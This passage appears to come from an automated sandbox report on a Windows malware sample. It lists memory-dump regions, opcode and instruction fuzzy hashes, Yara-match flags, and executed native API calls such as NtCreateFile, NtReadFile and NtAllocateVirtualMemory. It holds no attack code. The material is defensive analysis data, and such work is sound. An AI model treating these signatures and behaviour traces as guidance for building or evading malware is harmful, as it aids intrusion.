                                                                          • Instruction ID: 07a5db5c3bb695c49e036ca4790e88cd1e2256eb2071733d21cf8ae1fc17cb0a
                                                                          • Opcode Fuzzy Hash: 7328ea11e03ef318d509a7a25395ad20b7bc6158497d254b70ae92602a9093fd
                                                                          • Instruction Fuzzy Hash: 42016271A00209EFCB14DFA8D942A6EB7F5EF08704F1041ADA904DB382D635DA02CB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4042c49d8cd6182a23467f81c9d4a0547753ec7b9cba569e15b5e688a9d8ac97
                                                                          • Instruction ID: 6e6f13c3fccf6ef6795effffc86b4c6de437a45771e5029d5bedf8323812c497
                                                                          • Opcode Fuzzy Hash: 4042c49d8cd6182a23467f81c9d4a0547753ec7b9cba569e15b5e688a9d8ac97
                                                                          • Instruction Fuzzy Hash: A5011971A0121DAFCB14EFA9D945AAEB7F4EF19700F508069B905EB381E6349A00CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2bd3b3ac701279eaa6bfc0e90fb73c73f6175ce668975d96c8fb2acffe154bd1
                                                                          • Instruction ID: 842b08a2263ed8ff050b35b1ac5a3db0f1244d12b9101baae0eccbbda6f2c2ce
                                                                          • Opcode Fuzzy Hash: 2bd3b3ac701279eaa6bfc0e90fb73c73f6175ce668975d96c8fb2acffe154bd1
                                                                          • Instruction Fuzzy Hash: F0013175A01209EFDB10EFB8D945AAEB7F5EF18300F504059B905EB381DA34EA00CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37afdfb5e27f59e00056f4a089e0925bb854648065cb17ff4f6e5ca9d66d525b
                                                                          • Instruction ID: 0135d16d846826e0d8d0991ac6f6b0c8cda3217cae440eea6f0172d74ef5adcb
                                                                          • Opcode Fuzzy Hash: 37afdfb5e27f59e00056f4a089e0925bb854648065cb17ff4f6e5ca9d66d525b
                                                                          • Instruction Fuzzy Hash: 2CF06271A01258EFDB14EFE9D815A6EB7F4FF14300F44406DEA05EB381E6349900CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a95a2395b0afd2f84658c7718c3e4365213a67b6f53389937cba97ac3d67b7d
                                                                          • Instruction ID: 6b83f0aed227036f6ee97ff9a64e8f3707f8e8854a15b1afd007040ef10385ec
                                                                          • Opcode Fuzzy Hash: 4a95a2395b0afd2f84658c7718c3e4365213a67b6f53389937cba97ac3d67b7d
                                                                          • Instruction Fuzzy Hash: F1F09AB29657909EE7B687ACC804B22BFEC9B0567CF48846ADD0687342C7A4D8A0C251
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47483b7186315666918199c5ebcbbfdcac8ffc5489a880e328df6f54e3d4b3ad
                                                                          • Instruction ID: 57332f31cfcfefd8bea4b02a1addfc0e6b0f868f63b174e664450d1d79a18fe9
                                                                          • Opcode Fuzzy Hash: 47483b7186315666918199c5ebcbbfdcac8ffc5489a880e328df6f54e3d4b3ad
                                                                          • Instruction Fuzzy Hash: 3FF0202B4161858BEF326F2878203E1AFD3D755120B49808DD69017309CA3AC983CF25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                          • Instruction ID: 335ac27f5d9e8c71e1972ec2c3746729f9b839d60acaa97b35e02a52e6168716
                                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                          • Instruction Fuzzy Hash: CCE02B323405016BE711AE09CC80F0337AEDF92734F00407CB9001E242CAE5DC0887A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 837682a090da8f745b10962c42090860bdcc0dc2a5de513853325e53854146b0
                                                                          • Instruction ID: 639c289ebc4e318c1f83cfc476b6af057057d916aff5d371a5959e2782e6844f
                                                                          • Opcode Fuzzy Hash: 837682a090da8f745b10962c42090860bdcc0dc2a5de513853325e53854146b0
                                                                          • Instruction Fuzzy Hash: 1BF09070E046089FDB14EFA8D841A6EB7B4EB18300F508099E905AB281EA34D9008758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cae36e0418e878f8d34ec2abbc67d9aa65794885f6248b3ed20c9c8085f5c0c8
                                                                          • Instruction ID: 1153ff122ad278057fa1bcfcbb25d5bdfc545b4f0671cf3616ad6847476f5817
                                                                          • Opcode Fuzzy Hash: cae36e0418e878f8d34ec2abbc67d9aa65794885f6248b3ed20c9c8085f5c0c8
                                                                          • Instruction Fuzzy Hash: E4F082B1A04659EBDB10EBA8D906E7EB7F4EF04300F54049DBA05DB3C1EA34D900C799
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 141123350a31465b08ad03a3546f8792fe40007cf6ec87a280c3a9fa6fb5765a
                                                                          • Instruction ID: 2e66cc63244f547e47fe3fc3607eaf41072bcc14314838d5d7bfe4339d69fa9c
                                                                          • Opcode Fuzzy Hash: 141123350a31465b08ad03a3546f8792fe40007cf6ec87a280c3a9fa6fb5765a
                                                                          • Instruction Fuzzy Hash: E9F0E234A02245ABDF829B6CCD40B79BFB2AF14310F840259DC91AB261E7659803C789
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3bb0f0583751ca971ac1a96622439f52e2ce546b817fe918c8d62431f19c5f53
                                                                          • Instruction ID: 523ec789b9308e9e9b3c378a17ee4a385476b313611708bc0eba3838b54ce50f
                                                                          • Opcode Fuzzy Hash: 3bb0f0583751ca971ac1a96622439f52e2ce546b817fe918c8d62431f19c5f53
                                                                          • Instruction Fuzzy Hash: 27F05E71A05209ABDB14EBA8E946E6EB7B4EF18310F500299E915EB2C1EA34D9008759
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e075cafd7ad1a4d1528543756978bcbcb44040532da88015e665f56eaff1b35e
                                                                          • Instruction ID: ca30828fc18d9cec388fa0ea68cb74617055620376f10e2373ab5cd24bd498b5
                                                                          • Opcode Fuzzy Hash: e075cafd7ad1a4d1528543756978bcbcb44040532da88015e665f56eaff1b35e
                                                                          • Instruction Fuzzy Hash: 5FF0E2329257868FDB72DF2CC944B22BBECAB107B8F044464E805C7B2ACB25EC40C640
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9097a5f34e1c775b68864e5b8df39d45a57b3f406f62e9e363bff846b2946ba3
                                                                          • Instruction ID: df04493c5c1aada825eb2be806dd85825daf1bd2de4db70737e175c33b746131
                                                                          • Opcode Fuzzy Hash: 9097a5f34e1c775b68864e5b8df39d45a57b3f406f62e9e363bff846b2946ba3
                                                                          • Instruction Fuzzy Hash: 0990026124100802D1407599C815B07100AE7D0641F51C111E0014558DC656896576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6706a8d02a66cdbddef1a94c9553a3f72890c8f5f4a78119a41fae933ac946f7
                                                                          • Instruction ID: a18f9c329e27cbdf80d57e4ff6b3cfebb461311630841c9be230179f4739fb89
                                                                          • Opcode Fuzzy Hash: 6706a8d02a66cdbddef1a94c9553a3f72890c8f5f4a78119a41fae933ac946f7
                                                                          • Instruction Fuzzy Hash: 2F90027120144002D1407599C845A0B6009B7E0341F51C511E0415558CC6558856A271
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2d9edd2b1cecf339c130bae8dfcdd2220ed84c5aab8e5d773dd18f9120a1aba4
                                                                          • Instruction ID: e876d9c018c0d77c632797e7c7f150f6c836e1dd5a04558133d7eca7074590b2
                                                                          • Opcode Fuzzy Hash: 2d9edd2b1cecf339c130bae8dfcdd2220ed84c5aab8e5d773dd18f9120a1aba4
                                                                          • Instruction Fuzzy Hash: E690027120140402D10075998C09B471009A7D0342F51C111E5154559EC6A5C8917571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84c7f9d751ed45f173720bd3fe4dfc5d0d674c7af0211dfb248a70347d801ed6
                                                                          • Instruction ID: 37e8a590b403568ba5066fdc21eeadf62c6506b046f17c0a73438ae2ee791b40
                                                                          • Opcode Fuzzy Hash: 84c7f9d751ed45f173720bd3fe4dfc5d0d674c7af0211dfb248a70347d801ed6
                                                                          • Instruction Fuzzy Hash: D790026120144442D14076998C05F0F5109A7E1242F91C119E4146558CC95588556771
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55399cb8c4c603015b898940ddbd0f2539d8b763b3dfb72db95e6083aa09cc53
                                                                          • Instruction ID: 80ce03d6acf883f974ce690196e3d639569dceec5f799e7a59238f7804d80eda
                                                                          • Opcode Fuzzy Hash: 55399cb8c4c603015b898940ddbd0f2539d8b763b3dfb72db95e6083aa09cc53
                                                                          • Instruction Fuzzy Hash: EB900265221000020145B9994A0590B1449B7D6391391C115F1406594CC66188656371
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dac73ac48b1076de2863342dfe89c282bfe576052421d066ffd7eb5762ba081a
                                                                          • Instruction ID: 5403642d2443052a1f45df4d4e5fae4b6b7c2ee00431f06ce14da09608e33f0e
                                                                          • Opcode Fuzzy Hash: dac73ac48b1076de2863342dfe89c282bfe576052421d066ffd7eb5762ba081a
                                                                          • Instruction Fuzzy Hash: 6D9002E1201140924500B699C805F0B5509A7E0241B51C116E1044564CC5658851A175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 778c5ca2607f8d0c38ae681390197b002860573e11223c45b1f3361c8b83364c
                                                                          • Instruction ID: 128f83e61e4e8c73b377d7f13a514d841977d845d12666d178ad70a24cc400fb
                                                                          • Opcode Fuzzy Hash: 778c5ca2607f8d0c38ae681390197b002860573e11223c45b1f3361c8b83364c
                                                                          • Instruction Fuzzy Hash: 8A900271A0500012914075998C15A47500AB7E0781B55C111E0504558CC9948A5563F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bfde1287dde3650604175d6fe3f6620d2592744acdc22789dd1b1c8c5e24011b
                                                                          • Instruction ID: 9fc5801f580592621a66acd85918c25b082f6ec7b7badf4e70f7277000b4c90d
                                                                          • Opcode Fuzzy Hash: bfde1287dde3650604175d6fe3f6620d2592744acdc22789dd1b1c8c5e24011b
                                                                          • Instruction Fuzzy Hash: AB90027120100802D10475998C05A871009A7D0341F51C111E6014659ED6A588917171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ae38d176ed6aca2271e28e6290a998640c5a6c8e9cd38398bbb340bebe4c3d
                                                                          • Instruction ID: f8e1e7ebdca91334979b12213204e096f4c366254609b810bdb4e292f9ab2c7e
                                                                          • Opcode Fuzzy Hash: 06ae38d176ed6aca2271e28e6290a998640c5a6c8e9cd38398bbb340bebe4c3d
                                                                          • Instruction Fuzzy Hash: 2590027120100403D10075999909B071009A7D0241F51D511E041455CDD69688517171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6016443f41a5d0063ab5434e4dc2b5523c9bbfed402ec42a4d38b60ba448813
                                                                          • Instruction ID: df5bde7586cfb83f4d4cd806f1845e68edba95ade789b07dd893928e0ba5d62d
                                                                          • Opcode Fuzzy Hash: f6016443f41a5d0063ab5434e4dc2b5523c9bbfed402ec42a4d38b60ba448813
                                                                          • Instruction Fuzzy Hash: C090027520504442D50079999C05E871009A7D0345F51D511E041459CDC6948861B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41954b3242624263be56787313be6fb839649770b11266152397ae0e762420ad
                                                                          • Instruction ID: c22b9f0efbf1ea53e8fecb18cf82bb534bb77d426bcdc24592464eb5590dbb04
                                                                          • Opcode Fuzzy Hash: 41954b3242624263be56787313be6fb839649770b11266152397ae0e762420ad
                                                                          • Instruction Fuzzy Hash: 7990026120504442D10079999809E071009A7D0245F51D111E1054599DC6758851B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2929955d99d25e0fdeaeab643953235e9f9b5156b7130630dd785ca04371e44
                                                                          • Instruction ID: 44bcbf4b8f38de9191df54cf820ba48e701a262869cca310f474701b6033547a
                                                                          • Opcode Fuzzy Hash: a2929955d99d25e0fdeaeab643953235e9f9b5156b7130630dd785ca04371e44
                                                                          • Instruction Fuzzy Hash: A890026160500402D14075999819B071019A7D0241F51D111E0014558DC6998A5576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8637749a8172f6a5a50efc9462ec21f46157d78720eb5512fd228d1f70a034a
                                                                          • Instruction ID: 33a8ad997c1eff11ceeb61d0bc1819dc6ff93c329b5ca406db14494d5daa7eec
                                                                          • Opcode Fuzzy Hash: b8637749a8172f6a5a50efc9462ec21f46157d78720eb5512fd228d1f70a034a
                                                                          • Instruction Fuzzy Hash: 4B900271301000529500BAD99C05E4B5109A7F0341B51D115E4004558CC59488616171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd4d4c039ef82ebc95ab9ce676d5544db5bfdcdb916a35912e07e35b0ac2efd2
                                                                          • Instruction ID: ed6c4153f7873ead85bf065d1ada38acf0cacf0604bfb3acd980edd32e67604f
                                                                          • Opcode Fuzzy Hash: bd4d4c039ef82ebc95ab9ce676d5544db5bfdcdb916a35912e07e35b0ac2efd2
                                                                          • Instruction Fuzzy Hash: BF90027120504842D14075998805E471019A7D0345F51C111E0054698DD6658D55B6B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cc1a9ef3d19d2bd2f6706d9f562b57cdd9ca28a2d04a921b010cdcc9940e695
                                                                          • Instruction ID: b8e10a26b8ee01d5ad22a0851b9db88f381afe2a4228576ca5b4441ec4051d95
                                                                          • Opcode Fuzzy Hash: 1cc1a9ef3d19d2bd2f6706d9f562b57cdd9ca28a2d04a921b010cdcc9940e695
                                                                          • Instruction Fuzzy Hash: 0290027160500802D15075998815B471009A7D0341F51C111E0014658DC7958A5576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7614e7a1ad587bd43fe7a32b6e6841f97838c4821dc6bc817625896970b399a
                                                                          • Instruction ID: c342b4a1dca9bc9c8933ecc99e88d203c67dd37b5aada96e29632386d6cc91fa
                                                                          • Opcode Fuzzy Hash: e7614e7a1ad587bd43fe7a32b6e6841f97838c4821dc6bc817625896970b399a
                                                                          • Instruction Fuzzy Hash: 8190027120100842D10075998805F471009A7E0341F51C116E0114658DC655C8517571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 830dd5f92bcd4e9a860e5b08aabc285a73089b37ff9d50b558783a72b59c52b1
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016CFDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016CFE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016CFE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 440216e6533a7d1f5e4e386ff0057c409d960d51c921dc9d0a3ed2b0fcd4b28b
                                                                          • Instruction ID: c5db0aa26fce551c72be20b7d813ef92d07000f77d64374bce81664026440c24
                                                                          • Opcode Fuzzy Hash: 440216e6533a7d1f5e4e386ff0057c409d960d51c921dc9d0a3ed2b0fcd4b28b
                                                                          • Instruction Fuzzy Hash: 55F0F672200602BFE6201A45DC0AF33BF5BEB44F30F24431CF628561E1DA62F8608AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Executed Functions

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00983B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00983B87,007A002E,00000000,00000060,00000000,00000000), ref: 009881FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 87ead3c98cb454ba4aaa264bc0a3a45a5e0557d4b29b1ce52fdf1c8f15b3e3ac
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: B3F0B6B2200108ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00983B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00983B87,007A002E,00000000,00000060,00000000,00000000), ref: 009881FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(00983D42,5E972F59,FFFFFFFF,00983A01,?,?,00983D42,?,00983A01,FFFFFFFF,5E972F59,00983D42,?,00000000), ref: 009882A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(00983D42,5E972F59,FFFFFFFF,00983A01,?,?,00983D42,?,00983A01,FFFFFFFF,5E972F59,00983D42,?,00000000), ref: 009882A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 009883C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtClose.NTDLL(00983D20,?,?,00983D20,00000000,FFFFFFFF), ref: 00988305
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtClose.NTDLL(00983D20,?,?,00983D20,00000000,FFFFFFFF), ref: 00988305
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
